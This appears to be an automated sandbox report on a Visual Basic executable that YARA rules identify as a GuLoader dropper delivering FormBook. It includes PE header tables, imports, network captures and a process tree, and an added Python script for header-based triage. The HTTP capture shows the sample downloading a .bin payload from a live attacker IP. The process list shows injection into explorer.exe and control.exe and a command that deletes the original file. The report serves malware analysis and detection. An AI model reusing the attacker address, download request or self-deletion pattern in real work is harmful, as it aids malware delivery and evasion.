                              add byte ptr [edi+00h], bl
                              add byte ptr [eax], al
                              add byte ptr [ebx], dl
                              add byte ptr [edx+61h], al
                              popad
                              popad
                              jc 00007FDAB4B19166h
                              jnc 00007FDAB4B1916Eh
                              push 0000006Ch
                              imul esp, dword ptr [edi+68h], 00736465h

                              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x33f04 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x9c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x238 | 0x20 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1ac | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3358c | 0x34000 | False | 0.186218261719 | data | 4.29411829073 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x35000 | 0x1604 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x37000 | 0x9c8 | 0x1000 | False | 0.17919921875 | data | 2.17499641936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
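
The header values in the tables above are what a first triage pass reads out of a PE before running anything: a link timestamp of 0x5617397A (October 2015) on a file first served in May 2021, an entry point of 0x40186c at image base 0x400000, RELOCS_STRIPPED together with an empty base-relocation directory and an empty DLL Characteristics field, and a .text entropy of 4.29. The Python below is an added example and not Joe Sandbox code. It builds a synthetic PE32 that copies those header values (the section content is constructed, so its entropy is this example's, not the sample's), parses it with struct alone so that it runs without pefile, and applies the checks an analyst would apply: an image without relocations cannot be rebased and therefore never benefits from ASLR; an empty DllCharacteristics means neither DYNAMIC_BASE nor NX_COMPAT; a link timestamp years older than the first sighting is either an old build or a forged stamp, since the field is written by whoever builds the file; and entropy above about 7 bits per byte marks packed or encrypted sections. The three-year age threshold and the 7.0 entropy cut-off are this example's assumptions.

```python
import math
import struct
from datetime import datetime, timezone

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant block, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(blob):
    """Read the COFF header, optional header and section table with struct alone."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]
    if magic == 0x10B:                                        # PE32
        image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    elif magic == 0x20B:                                      # PE32+
        image_base = struct.unpack_from("<Q", blob, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", blob, opt + 70)[0]   # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": raw_size,
            "entropy": shannon_entropy(blob[raw_ptr:raw_ptr + raw_size]),
        })
    return {
        "machine": machine,
        "timestamp": datetime.fromtimestamp(tstamp, tz=timezone.utc),
        "characteristics": chars,
        "dll_characteristics": dll_chars,
        "entry_point": image_base + entry_rva,
        "sections": sections,
    }


def triage(info, first_seen):
    """Header-only findings in a fixed order; thresholds are this example's assumptions."""
    flags = []
    if info["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED:
        flags.append("relocs_stripped")          # cannot be rebased, so never gets ASLR
    if not info["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE:
        flags.append("no_dynamic_base")
    if not info["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_NX_COMPAT:
        flags.append("no_nx_compat")
    age_days = (first_seen - info["timestamp"]).days
    if age_days < 0:
        flags.append("timestamp_in_future")      # forged stamp or clock skew
    elif age_days > 3 * 365:
        flags.append("timestamp_stale")          # old build or forged: the field is attacker-controlled
    for s in info["sections"]:
        if s["entropy"] > 7.0:
            flags.append("high_entropy:" + s["name"])  # packed or encrypted content
    return flags


def triage_file(blob, first_seen_utc):
    """Parse and flag in one call; first_seen_utc is a 'YYYY-MM-DD' date taken as UTC."""
    info = parse_pe(blob)
    first_seen = datetime.fromisoformat(first_seen_utc).replace(tzinfo=timezone.utc)
    return info, triage(info, first_seen)


def build_sample_pe(text_bytes, timestamp=0x5617397A, entry_rva=0x186C):
    """Synthetic PE32 (headers plus one .text section) mirroring this report's
    header values. Constructed test input, not the analysed file."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                        # e_lfanew
    opt_size = 224
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, opt_size,
                       0x010F)  # RELOCS/LINE_NUMS/LOCAL_SYMS stripped, EXECUTABLE_IMAGE, 32BIT_MACHINE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 28, 0x400000)                    # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)              # section / file alignment
    struct.pack_into("<HH", opt, 68, 2, 0)                       # GUI subsystem, empty DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    raw_ptr = 0x200
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text_bytes), 0x1000, len(text_bytes),
                      raw_ptr, 0, 0, 0, 0, 0x60000020)            # CODE | EXECUTE | READ
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec
    return headers + b"\0" * (raw_ptr - len(headers)) + text_bytes
```

On a real file the same parse_pe() call takes the bytes read from disk; build_sample_pe() exists only so the example runs offline and reproduces the report's entry point and timestamp.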

                              Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x37898 | 0x130 | data | |
RT_ICON | 0x375b0 | 0x2e8 | data | |
RT_ICON | 0x37488 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0x37458 | 0x30 | data | |
RT_VERSION | 0x37150 | 0x308 | data | English | United States

                              Imports

DLL | Import
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaR4Var, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaVarMul, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, __vbaDateVar, __vbaI2Var, _CIlog, __vbaFileOpen, __vbaVarLateMemCallLdRf, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarDup, __vbaStrComp, __vbaVarLateMemCallLd, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                              Version Infos

Description | Data
Translation | 0x0409 0x04b0
LegalCopyright | Gitrama Digt
InternalName | POLITICALLY
FileVersion | 7.04.0005
CompanyName | Gitrama Digt
LegalTrademarks | Gitrama Digt
ProductName | Gitrama Digt
ProductVersion | 7.04.0005
FileDescription | Gitrama Digt
OriginalFilename | POLITICALLY.exe

                              Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                              Network Behavior

                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/11/21-20:43:41.179404 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49744 | 80 | 192.168.2.6 | 111.90.149.46
05/11/21-20:44:37.748915 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49759 | 99.83.154.118 | 192.168.2.6


                              TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 11, 2021 20:43:40.959551096 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.175250053 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.178649902 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.179404020 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.396996021 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397047997 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397064924 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397084951 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397090912 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.397100925 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397118092 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397131920 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.397135019 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397154093 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397172928 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397190094 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.397192001 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.397257090 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.397270918 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.614077091 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614115953 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614140987 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614190102 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.614252090 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.614274025 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614296913 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614327908 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.614356995 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.614526033 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614707947 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614732027 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614757061 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614787102 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614794016 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.614850998 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614852905 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.614902020 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.614923000 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614945889 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614974022 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.614990950 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.615401983 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.615430117 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.615436077 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.615454912 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.615482092 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.615497112 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.615593910 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.615621090 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.615879059 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.615952969 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.830636024 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.830676079 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.830698967 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.830722094 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.830744028 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.830760002 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.830769062 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.830792904 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.830817938 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.830838919 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.830923080 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.830974102 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831089973 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831106901 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.831113100 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831135988 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831160069 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831182003 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831203938 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831224918 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.831226110 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831229925 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.831250906 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831274033 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831298113 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831319094 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831338882 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.831372976 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.831377983 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.831422091 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.831428051 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.832262993 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832326889 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832345963 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.832350969 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832371950 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832393885 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832415104 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832443953 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.832489014 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.832659960 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832776070 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832782030 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.832799911 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832823992 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.832889080 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.832942009 CEST | 49744 | 80 | 192.168.2.6 | 111.90.149.46
May 11, 2021 20:43:41.832959890 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6
May 11, 2021 20:43:41.833071947 CEST | 80 | 49744 | 111.90.149.46 | 192.168.2.6

                              HTTP Request Dependency Graph

                              • 111.90.149.46

                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49744 | 111.90.149.46 | 80 | C:\Users\user\Desktop\POLITICALLY.exe
Timestamp | kBytes transferred | Direction | Data
May 11, 2021 20:43:41.179404020 CEST | 4882 | OUT | GET /bin_XNLhDlJvG218.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: 111.90.149.46
                              Cache-Control: no-cache
May 11, 2021 20:43:41.396996021 CEST | 4939 | IN | HTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Last-Modified: Mon, 10 May 2021 20:56:41 GMT
                              Accept-Ranges: bytes
                              ETag: "134b90fade45d71:0"
                              Server: Microsoft-IIS/10.0
                              Date: Tue, 11 May 2021 18:43:41 GMT
                              Content-Length: 164416


                              Code Manipulations

                              Statistics

                              Behavior


                              System Behavior

                              General

Start time: 20:42:20
Start date: 11/05/2021
Path: C:\Users\user\Desktop\POLITICALLY.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\POLITICALLY.exe'
Imagebase: 0x400000
File size: 225280 bytes
MD5 hash: 80B3365808440838596864BD6D492C02
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

                              General

Start time: 20:43:02
Start date: 11/05/2021
Path: C:\Users\user\Desktop\POLITICALLY.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\POLITICALLY.exe'
Imagebase: 0x400000
File size: 225280 bytes
MD5 hash: 80B3365808440838596864BD6D492C02
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                              General

Start time: 20:43:45
Start date: 11/05/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                              General

Start time: 20:44:00
Start date: 11/05/2021
Path: C:\Windows\SysWOW64\control.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\control.exe
Imagebase: 0x330000
File size: 114688 bytes
MD5 hash: 40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

                              General

Start time: 20:44:04
Start date: 11/05/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\POLITICALLY.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                              General

Start time: 20:44:04
Start date: 11/05/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                              Disassembly

                              Code Analysis
